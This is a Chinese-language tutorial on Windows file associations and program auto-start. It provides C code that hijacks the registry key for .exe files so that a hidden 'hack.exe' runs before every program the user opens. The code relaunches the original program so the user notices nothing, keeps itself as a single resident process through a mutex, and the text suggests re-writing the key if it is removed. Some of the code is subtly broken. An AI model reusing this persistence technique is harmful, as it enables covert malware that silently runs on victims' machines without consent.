C｜文件关连与程序自启动

首先我们来看Windows操作系统的文件关连是怎么回事。

例如.txt文本文件，右击，选择打开方式，选择默认程序：

根据这台电脑安装的应用程序，推荐打开的方式有3种，其中%SystemRoot%\system32\NOTEPAD.EXE是默认方式。

在注册表中有设置：

例如双击c:\virus.txt文件，便会打开此文件，而对于操作系统来说，是先打开notepad.exe，再由notepad.exe打开c:\virus.txt。

以下是用命令行方式打开此文件：

等同于：

如果用命令行的方式，用chrome打开virus.txt：

联系到上面注册表的设置：

「%1」即表示需要打开的文件，而前面的字符，即表示能够打开此文件的应用程序。

说了这么多，是为了说明.exe文件的打开方式，我们可不可以用一个.exe文件去打开另外一个.exe文件呢？

看下面exe文件的打开设置：

「%1」即表示.exe自身，因为本身就是.exe文件了，所以无需如同.txt文件一样，再要用另一个.exe文件去打开它。后面的「%*」是表示exe以命令行形式运行时所带的参数。

上面说到，可不可以用一个.exe文件去打开另外一个.exe文件，答案是可以的，如以下设置：

打开任何一个「.exe」文件，便可以先运行「.c:\hack.exe」文件，再运行点击的文件。

例如，在命令行下执行：c:\hack.exe c:\test.exe。便可以先打开hack.exe，然后打开test.exe。

有了这些前置知识，似乎就可以利用文件关联来打开一个我们需要的程序了。

首先当然就是要修改HKEY_CLASSES_ROOT\exefile\\shell\\open\\command中的值，就是可执行程序*.exe文件的关联处，缺省为”％1” ％*。当我们把值修改为c:\hack.exe ”％1” ％*后，以后打开exe文件就会激活C盘下的hack.exe。另外，我们要在hack.exe运行时取得传入的命令行参数「”％1”」，再启动原来的exe程序，这样对于一般的人来看好像什么事也没发生过。具体的演示代码如下：

#include <stdio.h>#include <windows.h>void myFunc(); // 自己想要实现的功能void hack(int argc, char *argv[]); // 随exe文件一起运行int main(int argc,char *argv[]){ hack(argc, argv); return 0;}void hack(int argc, char *argv[]) // 本程序hack.exe要伴随另一exe文件（例如B.exe）一起运行{ char fPath[256]; // B的文件路径 memset(fPath,0,256); if(argc!=1){ // argc!=1表示有参数 int length =strlen(argv[1]); // argv[0]表示程序自身，argv[1]表示第一个参数 // 当我们试图用此程序(hack.exe)去打开另一程序B时， // 另一程序B的文件路径就是argv[1] char *ch=(char *)malloc(length); strcpy(ch,argv[1]); for(int i=0;i<length;i++,ch++)// 把路径字符串中所有的'\'变为'\\' { if(*ch=='\\') strncat(fPath,'\\\\',2); else strncat(fPath,ch,1); } } // 在执行B程序之前先恢复注册表，否则用ShellExecute还是执行hack.exe。 char para[]='\'%1\' %*'; // 「'%1' %* 」 %1表示exe文件本身，加双引号可以避免路径中有空格而出错， %*表示运行参数 char* subkey = 'exefile\\shell\\open\\command'; RegSetValue(HKEY_CLASSES_ROOT,subkey,REG_SZ,(LPCTSTR)para,strlen(para)+1); ShellExecute(NULL,'open',fPath,NULL,NULL,SW_SHOW); //执行B程序 // 在程序执行完成后，再把注册表改为我们要启动的hack.exe TCHAR filename[256]; GetModuleFileName( NULL, filename, 255 ); // 得到程序全路径名 strcat(filename,' \'%1\' %*'); // 附加参数 RegSetValue(HKEY_CLASSES_ROOT,subkey,REG_SZ,(LPCTSTR)filename , strlen(filename) + 1); // 以上构成一个修改注册表和运行程序的循环 myFunc();}void myFunc(){ //MessageBox(NULL,'Hello',NULL,MB_OK); // 测试用，可以替换为自己想要实现的功能 //while(1) ; // 常驻内存}

上述代码运行一次后，只要exe程序一运行就会先执行hack.exe了。

但是，因为每启动一个exe程序，都会启动一次hack.exe，这是我们不想看到的。

如何能够防止一个程序多次启动呢？也就是确保只能够有一个进程在系统当中。

要防止多个进程同时出现，我们要使用CreateMutex()函数来创建互斥对象。互斥对象能够确保多个线程或进程对单个资源的互斥访问，也就是某个资源不会同时被两个或以上的线程或进程所访问。我们通过下面的代码来创建一个互斥对象：

void myMutex(){    HANDLE hMutex;    DWORD dwErr;    hMutex=CreateMutex(NULL,    // 无安全描述                       FALSE,   // 没有所有者                       'hack'); // 对象名    if(hMutex==NULL)            // hMutex为NULL标示创建失败    {        //MessageBox(NULL,'CreateMutex error!',NULL,MB_OK);    }    else    {        dwErr=GetLastError();        if(dwErr==ERROR_ALREADY_EXISTS) //互斥对象已经存在        {            //MessageBox(NULL,'Application has already running',NULL,MB_OK);            ExitProcess(0);        }    }}

上面的代码就可以确保只有一个进程在系统中。

但如果程序是常驻内存的话，需要把上面的创建互斥对象的代码也加进去，否则每打开一个exe程序就会多一个hack.exe。

…… ShellExecute(NULL,'open',fPath,NULL,NULL,SW_SHOW); //执行B程序 myMutex();……

另外，当文件关联处被改成c:\hack.exe ”％1” ％*后，如果把hack.exe删掉的话，那么所有的exe程序都不能够运行了！解决的办法是把c:\Windows\regedit.exe改名成regedit.com（因为.exe文件类型运行不了，所以改成com才能正常运行），然后运行它，依次找到HKEY_CLASSES_ROOT\exefile\shell\open\command，双击“默认”字符串，将其数值改为「'%1' %*」就可以了。当然，hack.exe还可以时刻监视注册表的这个键值是否是c:\hack.exe，如果不是就修改它，这样就可以确保hack.exe能够正常启动。

自启动的方式主要有注册表启动、Active X启动、系统服务启动、SVCHOST.EXE加载启动等。

-End-